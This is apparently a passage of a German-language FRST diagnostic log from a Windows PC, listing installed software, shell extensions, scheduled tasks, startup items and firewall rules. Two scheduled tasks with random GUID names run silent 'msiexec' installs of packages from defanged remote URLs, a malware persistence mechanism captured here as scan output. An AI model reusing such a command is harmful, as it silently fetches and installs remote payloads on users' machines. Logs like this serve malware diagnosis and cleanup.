Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 17.0.0.1072 - Intel Corporation)
Intel(R) Trusted Connect Service Client x86 (HKLM-x32\...\{C9552825-7BF2-4344-BA91-D3CD46F4C441}) (Version: 1.50.638.1 - Intel Corporation) Hidden
Intel(R) Trusted Connect Services Client (HKLM-x32\...\{99ee3c29-c7cd-450f-8db9-d43cc49de1c7}) (Version: 1.50.638.1 - Intel Corporation) Hidden
Intel® Chipsatz-Gerätesoftware (HKLM-x32\...\{eb0d4a41-3065-42b0-a868-c60d42d3ea98}) (Version: 10.1.17695.8086 - Intel(R) Corporation) Hidden
KeePass Password Safe 2.41 (HKLM-x32\...\KeePassPasswordSafe2_is1) (Version: 2.41 - Dominik Reichl)
Kits Configuration Installer (HKLM-x32\...\{6F502640-B753-C101-FFA5-B38C3FA5B29A}) (Version: 10.1.17134.12 - Microsoft) Hidden
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Launchy 2.5 (HKLM-x32\...\Launchy_21344213_is1) (Version:  - Code Jelly)
Logitech Options (HKLM\...\LogiOptions) (Version: 7.10.3 - Logitech)
Logitech Unifying-Software 2.50 (HKLM\...\Logitech Unifying) (Version: 2.50.25 - Logitech)
Malwarebytes Version 3.7.1.2839 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.7.1.2839 - Malwarebytes)
MediaMonkey 4.1 (HKLM-x32\...\MediaMonkey_is1) (Version: 4.1 - Ventis Media Inc.)
Microsoft ASP.NET MVC 2 (HKLM-x32\...\{DD8FF2F3-0D97-4CF3-AF78-FA0E1B242244}) (Version: 2.0.60926.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50918.0 - Microsoft Corporation)
Microsoft Teams (HKU\S-1-5-21-3149852207-3418298431-2824610350-1001\...\Teams) (Version: 1.2.00.1758 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706 (HKLM-x32\...\{95ac1cfa-f4fb-4d1b-8912-7f9d5fbb140d}) (Version: 14.15.26706.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (HKLM-x32\...\{7e9fae12-5bbf-47fb-b944-09c49e75c061}) (Version: 14.15.26706.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.17.1298.831 - Microsoft Corporation)
Mozilla Firefox 65.0 (x64 en-US) (HKLM\...\Mozilla Firefox 65.0 (x64 en-US)) (Version: 65.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 65.0 - Mozilla)
MSI Afterburner 4.5.0 (HKLM-x32\...\Afterburner) (Version: 4.5.0 - MSI Co., LTD)
MSI Development Tools (HKLM-x32\...\{1E406B46-65F4-91CE-65DA-DB66D5443B68}) (Version: 10.1.17134.12 - Microsoft Corporation) Hidden
MusicBrainz Picard (HKLM-x32\...\MusicBrainz Picard) (Version: 2.1 - MusicBrainz)
MyHarmony (HKLM-x32\...\{2AD8F8A1-ECE5-4890-BCC2-B4396370A0D4}) (Version: 1.0.308 - Logitech)
Nik Collection (HKLM-x32\...\Nik Collection) (Version: 1.2.11 - Google)
Node.js (HKLM\...\{9A1DA61D-112C-46CE-AB8F-AD31985866F5}) (Version: 10.13.0 - Node.js Foundation)
NZBGet (HKLM-x32\...\NZBGet) (Version:  - Andrey Prygunkov)
Online Plug-in (HKLM-x32\...\{95EFB196-E3F8-4260-B373-C89CB1357617}) (Version: 18.12.0.12 - Citrix Systems, Inc.) Hidden
On-premises data gateway (HKLM-x32\...\{a9582544-4bc4-4d59-b2ee-72a1ace9e1d5}) (Version: 3000.0.265 - Microsoft Corporation)
Plex Media Server (HKLM-x32\...\{1d74549e-937e-4772-b801-e67975fd087a}) (Version: 1.12.3.4973 - Plex, Inc.)
Plex Media Server (HKLM-x32\...\{6DFAA4DD-1152-434A-80FB-5FCA4174F0DA}) (Version: 1.12.3973 - Plex, Inc.) Hidden
Python 2.7.15 (64-bit) (HKLM\...\{16CD92A4-0152-4CB7-8FD6-9788D3363617}) (Version: 2.7.15150 - Python Software Foundation)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.31.828.2018 - Realtek)
RivaTuner Statistics Server 7.1.0 (HKLM-x32\...\RTSS) (Version: 7.1.0 - Unwinder)
SDK ARM Additions (HKLM-x32\...\{346B2C02-CC0D-6E09-8B9D-CAA2821473CF}) (Version: 10.1.17134.12 - Microsoft Corporation) Hidden
SDK ARM Redistributables (HKLM-x32\...\{825784BB-114D-ADB3-B65F-E1EB2A63C3BC}) (Version: 10.1.17134.12 - Microsoft Corporation) Hidden
Self-Service Plug-in (HKLM-x32\...\{02F73C0C-8D51-4E64-BD11-16EB0DD19776}) (Version: 18.12.0.3 - Citrix Systems, Inc.) Hidden
Sidify Music Converter 1.3.9 (HKLM-x32\...\Sidify Music Converter) (Version: 1.3.9 - Sidify)
Snagit 2018 (HKLM\...\{7813764F-2694-493E-B787-2AABD20363C5}) (Version: 18.2.1 - TechSmith Corporation) Hidden
Snagit 2018 (HKLM-x32\...\{ef34233a-02e6-453c-bdf0-252b98e1edbc}) (Version: 18.2.1.1590 - TechSmith Corporation)
SpeedCommander 17 (x64) (HKLM\...\SpeedCommander 17 (x64)) (Version: 17.30.8900.2 - SWE Sven Ritter)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Steuern17 (HKLM-x32\...\{361E3FE5-BCFA-42C5-AAB9-8AF4F6D87B2C}) (Version: 1.0.5 - Abraxas Informatik AG)
Stopping Plex (HKLM-x32\...\{C0E1AAAD-3F32-4554-B77E-6D3DA26F0A59}) (Version: 1.12.3973 - Plex, Inc.) Hidden
StoryBox Version 3.1.0.1 (HKLM-x32\...\{71BAF109-8F5F-4D59-906A-00ABF3DCFFE8}_is1) (Version: 3.1.0.1 - SeldatInc)
TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.2.26558 - TeamViewer)
tiptoi® Manager 4.0.1 (HKLM\...\{833392BB-E8C0-4066-9408-3A30FA43972F}_is1) (Version: 4.0.1 - Ravensburger AG)
Universal CRT Extension SDK (HKLM-x32\...\{18ABFDF6-23D9-87E6-015E-FFE3C7F153D5}) (Version: 10.1.17134.12 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{0D6B41AF-D117-8944-A059-3F9346A896C5}) (Version: 10.1.17134.12 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{B6273353-8B54-1F89-1A16-5940925104CE}) (Version: 10.1.17134.12 - Microsoft Corporation) Hidden
Universal CRT Tools x64 (HKLM\...\{BA6F1D53-C3F2-F9D5-80CE-CEF608E36AD3}) (Version: 10.1.17134.12 - Microsoft Corporation) Hidden
Universal CRT Tools x86 (HKLM-x32\...\{6E43CA0C-046E-4F38-A0A2-3B1BA139B661}) (Version: 10.1.17134.12 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{775886B8-DEE1-CB20-8A94-FC09FA54ECF6}) (Version: 10.1.17134.12 - Microsoft Corporation) Hidden
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{9CBA860F-7437-4A75-941C-8EF559F2D145}) (Version: 2.52.0.0 - Microsoft Corporation)
vcpp_crt.redist.clickonce (HKLM-x32\...\{8FB2E6A8-A132-4A6A-BFB8-CE71DC4764F2}) (Version: 14.15.26706 - Microsoft Corporation) Hidden
Visual Studio Build Tools 2017 (HKLM-x32\...\171d6a1c) (Version: 15.8.28010.2050 - Microsoft Corporation)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.2 - VideoLAN)
vs_FileTracker_Singleton (HKLM-x32\...\{8EB2C670-04C2-482D-BACD-B4095E27FD39}) (Version: 15.6.27309 - Microsoft Corporation) Hidden
WinAppDeploy (HKLM-x32\...\{5AD4A604-B476-1578-2A20-6B02FC6258BE}) (Version: 10.1.17134.12 - Microsoft Corporation) Hidden
WinCDEmu (HKLM-x32\...\WinCDEmu) (Version: 4.1 - Sysprogs)
Windows Mobile Connectivity Tools 10.0.15254.0 - Desktop x86 (HKLM-x32\...\{833F02C5-2C39-49F6-BD64-91D351081274}) (Version: 10.1.15254.1 - Microsoft Corporation)
Windows SDK AddOn (HKLM-x32\...\{E77C2F78-6089-48F8-89DF-DDF2850DFFD9}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Software Development Kit - Windows 10.0.17134.12 (HKLM-x32\...\{5f83ccda-0498-4b97-a298-16a642bf49f2}) (Version: 10.1.17134.12 - Microsoft Corporation)
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{389D182F-0ADA-5C7E-FF32-2573A821592C}) (Version: 10.1.17134.12 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{C3776B36-B34E-00E2-3009-95A6F1870B58}) (Version: 10.1.17134.12 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{965D1746-D94A-49B9-2A48-A14914CA3B57}) (Version: 10.1.17134.12 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{84C6B91B-67DA-DDE3-86F1-87A3E307E8C1}) (Version: 10.1.17134.12 - Microsoft Corporation) Hidden
WinRT Intellisense Mobile - en-us (HKLM-x32\...\{3755CD99-C62E-3312-DDD3-29A4F259270D}) (Version: 10.1.17134.12 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{729DA966-8590-2C1F-2178-16C1D32FD7FD}) (Version: 10.1.17134.12 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{F1C18506-3168-A9D9-E2D9-D23A512A326E}) (Version: 10.1.17134.12 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{4095D263-6A13-78D3-DEDA-AA3452011F6E}) (Version: 10.1.17134.12 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{C3243E23-2EB6-4419-2692-40944923B112}) (Version: 10.1.17134.12 - Microsoft Corporation) Hidden
WizTree v3.26 (HKLM\...\WizTree_is1) (Version: 3.26 - Antibody Software)
XMind 8 Update 7 (v3.7.7) (HKLM-x32\...\XMind_is1) (Version: 3.7.7.201801311814 - XMind Ltd.)
Zemana AntiMalware Version 3.0.693 (HKLM-x32\...\{4E1F3677-C72E-4F7D-B66E-85467B1A289E}_is1) (Version: 3.0.693 - Zemana(Beta))

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-3149852207-3418298431-2824610350-1001_Classes\CLSID\{19A6E644-14E6-4A60-B8D7-DD20610A871D}\InprocServer32 -> C:\Users\Fantacola\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.18345.2\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3149852207-3418298431-2824610350-1001_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 -> C:\Users\Fantacola\AppData\Local\Microsoft\OneDrive\19.002.0107.0008\amd64\FileSyncShell64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-3149852207-3418298431-2824610350-1001_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 -> C:\Users\Fantacola\AppData\Local\Microsoft\OneDrive\19.002.0107.0008\amd64\FileSyncShell64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-3149852207-3418298431-2824610350-1001_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 -> C:\Users\Fantacola\AppData\Local\Microsoft\OneDrive\19.002.0107.0008\amd64\FileSyncShell64.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-3149852207-3418298431-2824610350-1001_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\Fantacola\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.18345.2\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Keine Datei
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov)
ContextMenuHandlers1: [SnagItMainShellExt] -> {CF74B903-3389-469c-B3B6-0204D204FCBD} => C:\Program Files\TechSmith\Snagit 2018\DLLx64\SnagitShellExt64.dll [2018-06-25] (TechSmith Corporation -> TechSmith Corporation)
ContextMenuHandlers2: [WinCDEmu] -> {A9901FCD-B4DF-43A1-BD5D-6C9F88679497} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-28] (Sysprogs OU)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov)
ContextMenuHandlers4: [SnagItMainShellExt] -> {CF74B903-3389-469c-B3B6-0204D204FCBD} => C:\Program Files\TechSmith\Snagit 2018\DLLx64\SnagitShellExt64.dll [2018-06-25] (TechSmith Corporation -> TechSmith Corporation)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2019-02-01] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [WinCDEmu] -> {A9901FCD-B4DF-43A1-BD5D-6C9F88679497} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-28] (Sysprogs OU)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {189109BA-5727-4970-AE03-7F2FDE409CAA} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
Task: {218AC8D2-DBF1-4F50-AB7A-06E50CF44B96} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3149852207-3418298431-2824610350-1001 => C:\Users\Fantacola\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Task: {21E2402C-527D-46CC-82B5-39B440548ACE} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Task: {224585DE-D0C1-486F-AD98-C165D2E9D7EE} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1901.7-0\MpCmdRun.exe (Microsoft Corporation -> Microsoft Corporation)
Task: {4342200D-A153-4912-A4C0-D0F7BC08A65B} - System32\Tasks\ModifyLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe (Advanced Micro Devices, Inc.) [Datei ist nicht signiert]
Task: {587B5849-16CC-4E3A-A90E-4B7DD91444B8} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1901.7-0\MpCmdRun.exe (Microsoft Corporation -> Microsoft Corporation)
Task: {6BF09367-FBC3-445F-9CD7-ACDB3B2AF4F2} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe (AVAST Software s.r.o. -> AVAST Software)
Task: {6DCA2822-343D-4A2B-8956-2B6B15B3F3A2} - System32\Tasks\{E9BE5C8D-F278-A25C-CD0E-330EBB7D274B} => "msiexec" /q -package hxxps://refreshnerer711rb.info/1q92O5wT0Tx.4Ly
Task: {72A3E7D4-C2B3-45C3-8508-264C051651D4} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {73C766F0-05BF-4BF0-9A59-5B271808E201} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {74565AC4-768B-49B4-9E9F-C82E544353E8} - System32\Tasks\AMHelper => C:\Program Files (x86)\Zemana\AntiMalware\AntiMalware.exe (Zemana D.O.O. Sarajevo -> Zemana Ltd.)
Task: {881FF4DC-F11B-4146-919A-59874B0CBCBB} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\Intel(R) Management Engine Components\iCLS\IntelPTTEKRecertification.exe (Intel(R) Trust Services -> Intel(R) Corporation)
Task: {9B111674-839B-4C05-8654-48574D1FC060} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe (Piriform Software Ltd -> Piriform Software Ltd)
Task: {9BD09D31-2FEE-4353-AD4E-5D9FE5AF0C4F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {A03F0255-C68F-4451-91D3-76EB76E9F36F} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1901.7-0\MpCmdRun.exe (Microsoft Corporation -> Microsoft Corporation)
Task: {C37AB527-83E2-4F86-9392-CF148CD9A079} - System32\Tasks\AMDLinkUpdate => C:\Program Files\AMD\CIM\BIN64\InstallManagerApp.exe (Advanced Micro Devices, Inc.) [Datei ist nicht signiert]
Task: {DBCB0F2B-2760-49F0-A2CB-E63A1F1579CE} - System32\Tasks\{A739AAE7-28A5-047F-E408-A851D87C034F} => "msiexec" /q /i hxxps://refreshnerer711.info/KE3X12ox.tIW
Task: {F67E13A5-89ED-4C47-968E-92914979DDC0} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\dvrcmd.exe
Task: {F877A260-F3A5-46FF-9D06-C85D6B30010E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1901.7-0\MpCmdRun.exe (Microsoft Corporation -> Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)


ShortcutWithArgument: C:\Users\Fantacola\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2018-09-15 08:28 - 2018-09-15 08:28 - 000834088 _____ () C:\Windows\System32\InputHost.dll
2018-09-15 08:28 - 2018-09-15 08:28 - 000474624 _____ () C:\Windows\ShellExperiences\TileControl.dll
2019-01-30 17:36 - 2019-01-30 17:36 - 002801152 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll
2019-01-30 17:37 - 2019-01-30 17:37 - 001740800 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\Users\Public\AppData:CSM [476]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [474]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\amdrv.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\amdrv.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="2"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2017-09-29 14:46 - 2019-02-10 20:08 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path: C:\Python27\;C:\Python27\Scripts;C:\ProgramData\Boxstarter;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Calibre2\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files\nodejs\;C:\ProgramData\chocolatey\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files\Intel\Intel(R) Management Engine Components\DAL
HKU\S-1-5-21-3149852207-3418298431-2824610350-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Fantacola\AppData\Local\Packages\55888ChristopheLavalle.DynamicTheme_jdggxwd41xcr0\LocalState\Bing\MatildaBayBoathouse_ROW1768341568_1920x1080.0.jpg
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.

HKLM\...\StartupApproved\StartupFolder: => "HeadSetup™ Pro.lnk"
HKLM\...\StartupApproved\Run32: => "ConnectionCenter"
HKLM\...\StartupApproved\Run32: => "Redirector"
HKLM\...\StartupApproved\Run32: => "IJNetworkScannerSelectorEX"
HKLM\...\StartupApproved\Run32: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run32: => "KeePass 2 PreLoad"
HKU\S-1-5-21-3149852207-3418298431-2824610350-1001\...\StartupApproved\StartupFolder: => "Citrix Receiver.lnk"
HKU\S-1-5-21-3149852207-3418298431-2824610350-1001\...\StartupApproved\StartupFolder: => "Stay's score.lnk"
HKU\S-1-5-21-3149852207-3418298431-2824610350-1001\...\StartupApproved\StartupFolder: => "Citrix Workspace.lnk"
HKU\S-1-5-21-3149852207-3418298431-2824610350-1001\...\StartupApproved\StartupFolder: => "An OneNote senden.lnk"
HKU\S-1-5-21-3149852207-3418298431-2824610350-1001\...\StartupApproved\Run: => "BlueJeans"
HKU\S-1-5-21-3149852207-3418298431-2824610350-1001\...\StartupApproved\Run: => "CCleaner Smart Cleaning"
HKU\S-1-5-21-3149852207-3418298431-2824610350-1001\...\StartupApproved\Run: => "Google Update"
HKU\S-1-5-21-3149852207-3418298431-2824610350-1001\...\StartupApproved\Run: => "Plex Media Server"
HKU\S-1-5-21-3149852207-3418298431-2824610350-1001\...\StartupApproved\Run: => "Steam"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [UDP Query User{A18CBB64-9B6D-4D92-8044-4E56E6046DAE}C:\users\fantacola\appdata\local\programs\qlik\sense\node\node.exe] => (Allow) C:\users\fantacola\appdata\local\programs\qlik\sense\node\node.exe Keine Datei
FirewallRules: [TCP Query User{14D7F513-B823-4053-B737-A0F52ECE2E07}C:\users\fantacola\appdata\local\programs\qlik\sense\node\node.exe] => (Allow) C:\users\fantacola\appdata\local\programs\qlik\sense\node\node.exe Keine Datei
FirewallRules: [{D8F46D19-6B99-4AB1-A813-79C54A6E22FA}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc -> Google Inc.)
FirewallRules: [UDP Query User{141ADCF2-97DB-434B-ABBE-6807B17DA178}C:\program files\nzbget\nzbget.exe] => (Allow) C:\program files\nzbget\nzbget.exe ()
FirewallRules: [TCP Query User{9B4C873D-0979-4CAF-BA64-C91B522FC55E}C:\program files\nzbget\nzbget.exe] => (Allow) C:\program files\nzbget\nzbget.exe ()
FirewallRules: [UDP Query User{87D43DD2-0CD4-485D-A287-617D30D772AD}C:\users\fantacola\appdata\local\blue jeans\app\bluejeans.exe] => (Allow) C:\users\fantacola\appdata\local\blue jeans\app\bluejeans.exe (Blue Jeans Network -> Blue Jeans)
FirewallRules: [TCP Query User{2DA06803-EE1C-4DAE-BA6D-EC5D4DE75945}C:\users\fantacola\appdata\local\blue jeans\app\bluejeans.exe] => (Allow) C:\users\fantacola\appdata\local\blue jeans\app\bluejeans.exe (Blue Jeans Network -> Blue Jeans)
